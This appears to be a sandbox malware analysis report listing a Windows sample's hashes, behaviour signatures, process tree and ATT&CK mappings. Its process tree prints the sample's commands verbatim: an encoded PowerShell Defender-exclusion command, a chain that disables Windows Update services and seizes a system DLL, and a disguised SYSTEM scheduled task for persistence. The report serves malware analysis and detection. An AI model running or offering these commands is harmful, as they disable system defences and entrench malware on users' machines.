Analysis

  • max time kernel
    308s
  • max time network
    318s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    10-05-2022 22:15

General

  • Target

    e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe

  • Size

    5.3MB

  • MD5

    52fdd7f3ed1b50bc5794983a37cb4064

  • SHA1

    4a185751e9e94dccb3330ca79f893de7ca080482

  • SHA256

    e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2

  • SHA512

    4f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Executes dropped EXE 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe
    "C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1352
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe"
      2⤵
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1928
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3500
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1020
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1820
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          4⤵
            PID:232
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            4⤵
              PID:192
            • C:\Windows\system32\sc.exe
              sc stop wuauserv
              4⤵
                PID:320
              • C:\Windows\system32\sc.exe
                sc stop bits
                4⤵
                  PID:188
                • C:\Windows\system32\sc.exe
                  sc stop dosvc
                  4⤵
                    PID:2324
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                    4⤵
                    • Modifies registry key
                    PID:3212
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                    4⤵
                    • Modifies registry key
                    PID:2204
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                    4⤵
                    • Modifies security service
                    • Modifies registry key
                    PID:4028
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                    4⤵
                    • Modifies registry key
                    PID:1812
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                    4⤵
                    • Modifies registry key
                    PID:3860
                  • C:\Windows\system32\takeown.exe
                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                    4⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3964
                  • C:\Windows\system32\icacls.exe
                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                    4⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:2840
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:2328
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:1688
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:2136
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:1020
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                    4⤵
                      PID:2388
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                      4⤵
                        PID:224
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                        4⤵
                          PID:220
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                          4⤵
                            PID:3512
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                            4⤵
                              PID:2288
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                              4⤵
                                PID:2272
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                4⤵
                                  PID:3632
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
                                3⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1108
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
                                  4⤵
                                  • Creates scheduled task(s)
                                  PID:1340
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                3⤵
                                • Suspicious use of WriteProcessMemory
                                PID:512
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                  4⤵
                                    PID:3616
                            • C:\Program Files\Windows\services.exe
                              "C:\Program Files\Windows\services.exe"
                              1⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:1632
                              • C:\Windows\System32\conhost.exe
                                "C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"
                                2⤵
                                • Drops file in System32 directory
                                • Suspicious use of SetThreadContext
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:1148
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
                                  3⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1368
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
                                    4⤵
                                    • Drops file in System32 directory
                                    • Modifies data under HKEY_USERS
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3868
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                  3⤵
                                    PID:196
                                    • C:\Windows\system32\sc.exe
                                      sc stop UsoSvc
                                      4⤵
                                        PID:160
                                      • C:\Windows\system32\sc.exe
                                        sc stop WaaSMedicSvc
                                        4⤵
                                          PID:1664
                                        • C:\Windows\system32\sc.exe
                                          sc stop wuauserv
                                          4⤵
                                            PID:2224
                                          • C:\Windows\system32\sc.exe
                                            sc stop bits
                                            4⤵
                                              PID:2200
                                            • C:\Windows\system32\sc.exe
                                              sc stop dosvc
                                              4⤵
                                                PID:1808
                                              • C:\Windows\system32\reg.exe
                                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                                4⤵
                                                • Modifies registry key
                                                PID:4048
                                              • C:\Windows\system32\reg.exe
                                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                4⤵
                                                • Modifies registry key
                                                PID:2176
                                              • C:\Windows\system32\reg.exe
                                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                                4⤵
                                                • Modifies registry key
                                                PID:3464
                                              • C:\Windows\system32\reg.exe
                                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                4⤵
                                                • Modifies registry key
                                                PID:3812
                                              • C:\Windows\system32\reg.exe
                                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                                4⤵
                                                • Modifies registry key
                                                PID:2848
                                              • C:\Windows\system32\takeown.exe
                                                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                4⤵
                                                • Possible privilege escalation attempt
                                                • Modifies file permissions
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2736
                                              • C:\Windows\system32\icacls.exe
                                                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                                4⤵
                                                • Possible privilege escalation attempt
                                                • Modifies file permissions
                                                PID:872
                                              • C:\Windows\system32\reg.exe
                                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                4⤵
                                                • Modifies registry key
                                                PID:1108
                                              • C:\Windows\system32\reg.exe
                                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                4⤵
                                                • Modifies registry key
                                                PID:644
                                              • C:\Windows\system32\reg.exe
                                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                4⤵
                                                • Modifies registry key
                                                PID:2352
                                              • C:\Windows\system32\reg.exe
                                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                4⤵
                                                • Modifies registry key
                                                PID:1752
                                              • C:\Windows\system32\schtasks.exe
                                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                4⤵
                                                  PID:3816
                                                • C:\Windows\system32\schtasks.exe
                                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                                  4⤵
                                                    PID:2660
                                                  • C:\Windows\system32\schtasks.exe
                                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                                    4⤵
                                                      PID:2568
                                                    • C:\Windows\system32\schtasks.exe
                                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                      4⤵
                                                        PID:2728
                                                      • C:\Windows\system32\schtasks.exe
                                                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                        4⤵
                                                          PID:1568
                                                        • C:\Windows\system32\schtasks.exe
                                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                          4⤵
                                                            PID:3824
                                                          • C:\Windows\system32\schtasks.exe
                                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                            4⤵
                                                              PID:4060
                                                          • C:\Windows\System32\conhost.exe
                                                            C:\Windows\System32\conhost.exe
                                                            3⤵
                                                              PID:1344
                                                              • C:\Windows\System32\conhost.exe
                                                                "C:\Windows\System32\conhost.exe" "jgimrcmwq"
                                                                4⤵
                                                                  PID:3376

                                                          Network

                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                          Execution

                                                          Scheduled Task

                                                          1
                                                          T1053

                                                          Persistence

                                                          Modify Existing Service

                                                          2
                                                          T1031

                                                          Scheduled Task

                                                          1
                                                          T1053

                                                          Privilege Escalation

                                                          Scheduled Task

                                                          1
                                                          T1053

                                                          Defense Evasion

                                                          Modify Registry

                                                          2
                                                          T1112

                                                          Impair Defenses

                                                          1
                                                          T1562

                                                          File Permissions Modification

                                                          1
                                                          T1222

                                                          Impact

                                                          Service Stop

                                                          1
                                                          T1489

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\Program Files\Windows\services.exe
                                                            Filesize

                                                            5.3MB

                                                            MD5

                                                            52fdd7f3ed1b50bc5794983a37cb4064

                                                            SHA1

                                                            4a185751e9e94dccb3330ca79f893de7ca080482

                                                            SHA256

                                                            e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2

                                                            SHA512

                                                            4f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f

                                                          • C:\Program Files\Windows\services.exe
                                                            Filesize

                                                            5.3MB

                                                            MD5

                                                            52fdd7f3ed1b50bc5794983a37cb4064

                                                            SHA1

                                                            4a185751e9e94dccb3330ca79f893de7ca080482

                                                            SHA256

                                                            e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2

                                                            SHA512

                                                            4f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f

                                                          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
                                                            Filesize

                                                            539B

                                                            MD5

                                                            84f2160705ac9a032c002f966498ef74

                                                            SHA1

                                                            e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

                                                            SHA256

                                                            7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

                                                            SHA512

                                                            f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

                                                          • memory/160-360-0x0000000000000000-mapping.dmp
                                                          • memory/188-173-0x0000000000000000-mapping.dmp
                                                          • memory/192-171-0x0000000000000000-mapping.dmp
                                                          • memory/196-359-0x0000000000000000-mapping.dmp
                                                          • memory/220-219-0x0000000000000000-mapping.dmp
                                                          • memory/224-218-0x0000000000000000-mapping.dmp
                                                          • memory/232-170-0x0000000000000000-mapping.dmp
                                                          • memory/320-172-0x0000000000000000-mapping.dmp
                                                          • memory/512-184-0x0000000000000000-mapping.dmp
                                                          • memory/644-380-0x0000000000000000-mapping.dmp
                                                          • memory/872-372-0x0000000000000000-mapping.dmp
                                                          • memory/1020-137-0x00000196C4610000-0x00000196C4632000-memory.dmp
                                                            Filesize

                                                            136KB

                                                          • memory/1020-140-0x00000196C4810000-0x00000196C4886000-memory.dmp
                                                            Filesize

                                                            472KB

                                                          • memory/1020-132-0x0000000000000000-mapping.dmp
                                                          • memory/1020-216-0x0000000000000000-mapping.dmp
                                                          • memory/1108-379-0x0000000000000000-mapping.dmp
                                                          • memory/1108-182-0x0000000000000000-mapping.dmp
                                                          • memory/1148-390-0x000002522CB20000-0x000002522CB32000-memory.dmp
                                                            Filesize

                                                            72KB

                                                          • memory/1148-368-0x000002522CAF0000-0x000002522CAF6000-memory.dmp
                                                            Filesize

                                                            24KB

                                                          • memory/1340-183-0x0000000000000000-mapping.dmp
                                                          • memory/1344-374-0x0000000000401BEA-mapping.dmp
                                                          • memory/1344-378-0x0000000000400000-0x000000000040C000-memory.dmp
                                                            Filesize

                                                            48KB

                                                          • memory/1344-373-0x0000000000400000-0x000000000040C000-memory.dmp
                                                            Filesize

                                                            48KB

                                                          • memory/1352-117-0x0000000000400000-0x0000000000C91000-memory.dmp
                                                            Filesize

                                                            8.6MB

                                                          • memory/1368-201-0x0000000000000000-mapping.dmp
                                                          • memory/1568-387-0x0000000000000000-mapping.dmp
                                                          • memory/1632-189-0x0000000000400000-0x0000000000C91000-memory.dmp
                                                            Filesize

                                                            8.6MB

                                                          • memory/1664-361-0x0000000000000000-mapping.dmp
                                                          • memory/1688-214-0x0000000000000000-mapping.dmp
                                                          • memory/1752-382-0x0000000000000000-mapping.dmp
                                                          • memory/1808-364-0x0000000000000000-mapping.dmp
                                                          • memory/1812-178-0x0000000000000000-mapping.dmp
                                                          • memory/1820-169-0x0000000000000000-mapping.dmp
                                                          • memory/1928-122-0x000002128A6F0000-0x000002128A8CD000-memory.dmp
                                                            Filesize

                                                            1.9MB

                                                          • memory/1928-124-0x00000212A51F0000-0x00000212A53CC000-memory.dmp
                                                            Filesize

                                                            1.9MB

                                                          • memory/2136-215-0x0000000000000000-mapping.dmp
                                                          • memory/2176-366-0x0000000000000000-mapping.dmp
                                                          • memory/2200-363-0x0000000000000000-mapping.dmp
                                                          • memory/2204-176-0x0000000000000000-mapping.dmp
                                                          • memory/2224-362-0x0000000000000000-mapping.dmp
                                                          • memory/2272-222-0x0000000000000000-mapping.dmp
                                                          • memory/2288-221-0x0000000000000000-mapping.dmp
                                                          • memory/2324-174-0x0000000000000000-mapping.dmp
                                                          • memory/2328-213-0x0000000000000000-mapping.dmp
                                                          • memory/2352-381-0x0000000000000000-mapping.dmp
                                                          • memory/2388-217-0x0000000000000000-mapping.dmp
                                                          • memory/2568-385-0x0000000000000000-mapping.dmp
                                                          • memory/2660-384-0x0000000000000000-mapping.dmp
                                                          • memory/2728-386-0x0000000000000000-mapping.dmp
                                                          • memory/2736-371-0x0000000000000000-mapping.dmp
                                                          • memory/2840-181-0x0000000000000000-mapping.dmp
                                                          • memory/2848-370-0x0000000000000000-mapping.dmp
                                                          • memory/3212-175-0x0000000000000000-mapping.dmp
                                                          • memory/3376-398-0x0000016A81980000-0x0000016A81986000-memory.dmp
                                                            Filesize

                                                            24KB

                                                          • memory/3376-392-0x0000016A81610000-0x0000016A81617000-memory.dmp
                                                            Filesize

                                                            28KB

                                                          • memory/3464-367-0x0000000000000000-mapping.dmp
                                                          • memory/3500-131-0x0000000000000000-mapping.dmp
                                                          • memory/3512-220-0x0000000000000000-mapping.dmp
                                                          • memory/3616-186-0x0000000000000000-mapping.dmp
                                                          • memory/3632-223-0x0000000000000000-mapping.dmp
                                                          • memory/3812-369-0x0000000000000000-mapping.dmp
                                                          • memory/3816-383-0x0000000000000000-mapping.dmp
                                                          • memory/3824-388-0x0000000000000000-mapping.dmp
                                                          • memory/3860-179-0x0000000000000000-mapping.dmp
                                                          • memory/3868-228-0x0000021E1EB70000-0x0000021E1EB8C000-memory.dmp
                                                            Filesize

                                                            112KB

                                                          • memory/3868-202-0x0000000000000000-mapping.dmp
                                                          • memory/3868-234-0x0000021E1ED50000-0x0000021E1EE09000-memory.dmp
                                                            Filesize

                                                            740KB

                                                          • memory/3868-267-0x0000021E1EB60000-0x0000021E1EB6A000-memory.dmp
                                                            Filesize

                                                            40KB

                                                          • memory/3964-180-0x0000000000000000-mapping.dmp
                                                          • memory/4028-177-0x0000000000000000-mapping.dmp
                                                          • memory/4048-365-0x0000000000000000-mapping.dmp
                                                          • memory/4060-389-0x0000000000000000-mapping.dmp